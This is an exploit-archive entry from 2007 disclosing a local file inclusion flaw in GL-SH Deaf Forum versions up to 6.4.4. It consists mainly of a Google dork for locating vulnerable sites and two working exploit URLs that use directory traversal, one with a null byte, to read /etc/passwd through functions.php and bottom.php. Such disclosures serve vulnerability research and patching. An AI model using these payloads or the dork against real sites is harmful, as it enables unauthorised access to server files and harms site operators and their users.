[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : GL-SH Deaf Forum <= 6.4.4 Local File Inclusion Vulnerabilities
# Published : 2007-06-28
# Author : Katatafish
# Previous Title : b1gbb 2.24.0 (SQL Injection / XSS) Remote Vulnerabilities
# Next Title : WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability
###GL-SH Deaf Board Version <= 6.4.4 local file inclusion###
#download: http://www.frank-karau.de/download/Deafforum_version_6.4.3.zip
#found by: Katatafish (karatatata@hush.com)
#google dork:"2005 www.frank-karau.de" | "2006 www.frank-karau.de"
#exploit:
http://www.site.com/[path]/functions.php?FORUM_LANGUAGE=../../../../../../../../../../../etc/passwd
http://www.site.com/[path]/bottom.php?style=../../../../../../.././etc/passwd%00
# www.Syue.com [2007-06-28]